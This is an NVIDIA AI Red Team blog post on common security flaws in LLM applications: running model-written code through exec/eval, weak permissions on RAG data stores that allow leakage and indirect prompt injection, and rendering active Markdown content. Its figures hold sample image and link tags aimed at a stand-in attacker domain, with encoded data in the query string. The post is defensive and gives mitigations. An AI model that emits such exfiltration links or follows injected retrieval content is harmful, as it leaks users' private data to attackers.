NVIDIA Developer · October 3, 00:53
NVIDIA AI Red Team Reveals Common Security Vulnerabilities in Large Language Model Applications

Over the past several years, the NVIDIA AI Red Team (AIRT) has performed security assessments of a large number of AI systems and identified several security vulnerabilities that commonly appear in large language model (LLM) applications. This post highlights the three most significant risks: executing LLM-generated code, which can lead to remote code execution (RCE); improper access control on retrieval-augmented generation (RAG) data sources, which can cause data leakage; and rendering active content in LLM outputs, which can lead to data exfiltration. The article explains how these vulnerabilities arise and provides corresponding mitigations, aiming to help developers harden LLM applications during development and defend against potential attacks.

⚠️ **Executing LLM-generated code:** If code generated by an LLM is run through functions such as `exec` or `eval` without sufficient isolation, attackers can use prompt injection to make the model produce malicious code, achieving remote code execution (RCE) and potentially taking over the entire application environment. Mitigations include avoiding high-risk functions such as `exec` and `eval`, or executing dynamic code only inside a secure sandbox.

🗂️ **Insecure access control on RAG data sources:** In a retrieval-augmented generation (RAG) architecture, if read permissions on sensitive information are not enforced on a per-user basis, users may be able to access data they are not authorized to see. This usually stems from misconfigured permissions on the source data or from a RAG data store that fails to faithfully reproduce the source permissions. In addition, broad write access to the RAG data store can be exploited for indirect prompt injection, poisoning application results or stealing user data. Carefully review how delegated authorization is managed and restrict write access to the RAG data store.

🖼️ **Active content rendering in LLM outputs:** Markdown and other active content (such as links and images) in LLM outputs can be used for data exfiltration. Attackers can lure users into clicking malicious links or rendering malicious images, causing the browser to issue a network request to the attacker's server that carries encoded sensitive data. To guard against this risk, use content security policies to restrict where images may be loaded from, display hyperlink destinations explicitly, or strictly sanitize LLM output to remove potentially active content.

Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.  

Common findings

In this blog, we share key findings from those assessments and how to mitigate the most significant risks.

Vulnerability 1: Executing LLM-generated code can lead to remote code execution

One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.

The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.
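To make the risk concrete, here is a minimal Python sketch of the anti-pattern (the helper names are hypothetical, not taken from any particular application): model output flows straight into `exec`, so whatever a prompt injection convinces the model to write is exactly what the server runs.

```python
def generate_analysis_code(question: str) -> str:
    # Stand-in for a real LLM call; the returned string is attacker-influenced
    # whenever the question or any retrieved context can be prompt-injected.
    return "result = sum(range(10))"

def run_analysis(question: str) -> dict:
    code = generate_analysis_code(question)
    scope: dict = {}
    exec(code, scope)  # a prompt injection here becomes remote code execution
    return scope

print(run_analysis("What is the total?")["result"])
```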

Figure 1. A prompt injection used to gain remote code execution against a system that passes LLM-generated code into an exec statement to perform data analysis

The fix here is clear: avoid using exec, eval, or similar constructs—especially in LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval are nested far into the library and potentially protected by guardrails, an attacker can encapsulate their malicious command in layers of evasion and obfuscation.

In Figure 1, a prompt injection gains RCE through encapsulation in guardrail evasions (shown in green) and prompt engineering around the system prompts introduced by calls in the library (blue and orange), before the final payload (pink).

Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.
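As a hedged illustration of that structure (the JSON shape and the function names are assumptions, not a prescribed interface), the application can ask the model for a structured intent and dispatch only to an explicit allowlist of functions:

```python
import json

# The model is prompted to answer with JSON like {"action": "...", "args": {...}};
# only actions on this allowlist are ever executed, and arguments are coerced
# to plain strings before use.
def plot_histogram(column: str) -> str:
    return f"(plot of histogram for column {column!r})"

def describe_column(column: str) -> str:
    return f"(summary statistics for column {column!r})"

ALLOWED_ACTIONS = {
    "plot_histogram": plot_histogram,
    "describe_column": describe_column,
}

def dispatch(llm_response: str) -> str:
    request = json.loads(llm_response)          # anything that isn't valid JSON is rejected
    handler = ALLOWED_ACTIONS.get(request.get("action"))
    if handler is None:
        raise ValueError("requested action is not permitted")
    column = str(request.get("args", {}).get("column", ""))
    return handler(column)

print(dispatch('{"action": "plot_histogram", "args": {"column": "age"}}'))
```

Because the LLM never supplies executable code, a prompt injection can at worst invoke one of the permitted functions with a string argument.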

Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:

First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn’t be able to see. We commonly see this happen in the following ways. 

- The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven't been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
- The RAG data store doesn't faithfully reproduce source-specific permissions, often by use of an overpermissioned "read" token to the original source of the documents.
- Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.

Reviewing how delegated authorization is managed to the document or data sources can help catch this issue early, and teams can design around it.
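One way to catch the read-permission problem early is to enforce the ACL again at retrieval time, before any retrieved text reaches the augmented prompt. The sketch below is a simplified assumption of what that check might look like; the metadata field names are illustrative only.

```python
from dataclasses import dataclass, field

@dataclass
class RetrievedChunk:
    text: str
    source: str
    allowed_principals: set = field(default_factory=set)  # ACLs captured at ingest time

def filter_by_acl(chunks, user_id: str, user_groups: set):
    """Drop any retrieved chunk the requesting user is not entitled to read."""
    principals = {user_id} | user_groups
    return [c for c in chunks if c.allowed_principals & principals]

chunks = [
    RetrievedChunk("Q3 board deck notes", "finance/board-deck", {"group:finance"}),
    RetrievedChunk("Office Wi-Fi setup guide", "it/onboarding", {"group:everyone"}),
]
# Only the onboarding document is eligible for alice's augmented prompt.
visible = filter_by_acl(chunks, "alice", {"group:everyone"})
print([c.source for c in visible])
```

A check like this only helps if the ACL metadata is kept in sync with the source; otherwise the staleness problem described above simply reappears one layer down.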

The other serious vulnerability we commonly see is broad access to write to the RAG data store. For instance, if a user's emails are part of the data used in the retrieval phase of a RAG pipeline, anyone who knows this can simply send the user an email and have its content show up in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user's personal documents or data.

Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.

In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach.  In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.  
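A minimal sketch of that kind of scoping, assuming illustrative per-document metadata fields (`owner`, `org`, `external`) rather than any particular product's schema, might look like this:

```python
# Restrict retrieval candidates to the scope the user selected:
# "mine", "organization", or "all".
def in_scope(doc_meta: dict, scope: str, user_id: str, org_id: str) -> bool:
    if scope == "mine":
        return doc_meta.get("owner") == user_id
    if scope == "organization":
        return doc_meta.get("org") == org_id and not doc_meta.get("external", False)
    return True  # "all": no additional restriction

docs = [
    {"title": "Roadmap", "owner": "alice", "org": "acme", "external": False},
    {"title": "Shared deck", "owner": "mallory", "org": "other-co", "external": True},
]
print([d["title"] for d in docs if in_scope(d, "organization", "alice", "acme")])
```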

Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.
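As one possible shape for such a guardrail check (a minimal sketch, assuming the application already has an `embed()` helper that returns a vector for a piece of text; the threshold value is arbitrary), retrieved chunks whose similarity to the query falls below a cutoff can simply be dropped before augmentation:

```python
import math

def embed(text: str) -> list:
    """Placeholder: plug in whatever embedding model the application already uses."""
    raise NotImplementedError

def cosine(a, b) -> float:
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b)))

def keep_on_topic(query: str, chunks: list, threshold: float = 0.3) -> list:
    """Return only retrieved chunks that are plausibly relevant to the query."""
    q = embed(query)
    return [c for c in chunks if cosine(q, embed(c)) >= threshold]
```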

Vulnerability 3: Active content rendering of LLM outputs

The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.

If an attacker appends content to a link or image URL that points at a server they control, that content appears in the attacker's server logs whenever the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker's domain to fetch the image data, and that same network call can carry encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user's conversation history into a link, leading to data exfiltration.

```html
<div class="markdown-body">
  <p>
    <img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvcmQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">
  </p>
  <h3>Sources</h3>
</div>
```
Figure 2. Rendered HTML of an LLM response containing an image whose source points at an attacker-controlled domain, with encoded data in the query string

Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.

```html
<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w"
   href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp"
   node="[object Object]" target="_blank">click here to learn more!</a>
```
Figure 3. A chat session with the server returning a hyperlink

To mitigate this vulnerability, we recommend one or more of the following:

- Use image content security policies that only allow images to be loaded from a predetermined list of "safe" sites. This prevents the user's browser from rendering images automatically from an attacker's servers.
- For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be "inactive," requiring a copy-paste operation to access the domain.
- Sanitize all LLM output to attempt to remove Markdown, HTML, URLs, or other potential active content that is generated dynamically by the LLM (see the sketch after this list).
- As a last resort, disable active content entirely within the user interface.
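The sanitization step can take many forms; the Python sketch below is one illustrative assumption (the regular expressions and the `ALLOWED_IMAGE_HOSTS` allowlist are hypothetical), dropping Markdown images from untrusted hosts and exposing the raw destination of every link:

```python
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"assets.example.com"}  # hypothetical allowlist, mirrors the CSP img-src

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"\[([^\]]+)\]\(([^)\s]+)[^)]*\)")

def sanitize(llm_output: str) -> str:
    """Strip Markdown images from untrusted hosts and expose the raw URL of every link."""

    def keep_or_drop_image(match: re.Match) -> str:
        host = urlparse(match.group(1)).netloc
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"

    def expose_link(match: re.Match) -> str:
        # Show the destination next to the label so the user sees where the link goes.
        return f"{match.group(1)} ({match.group(2)})"

    text = MD_IMAGE.sub(keep_or_drop_image, llm_output)
    return MD_LINK.sub(expose_link, text)

print(sanitize("See ![chart](https://iamanevildomain.com/q?c2VjcmV0) and [details](https://iamanevildomain.com/q?ZGF0YQ)."))
```

Pairing a sanitizer like this with an image content security policy (for example, `img-src 'self' assets.example.com`) means the browser still refuses to fetch images from other origins even if something slips past the output filtering.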

Conclusion

The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them.  Our top three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these vulnerabilities, you can secure your LLM implementation against the most common and impactful vulnerabilities.

If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.
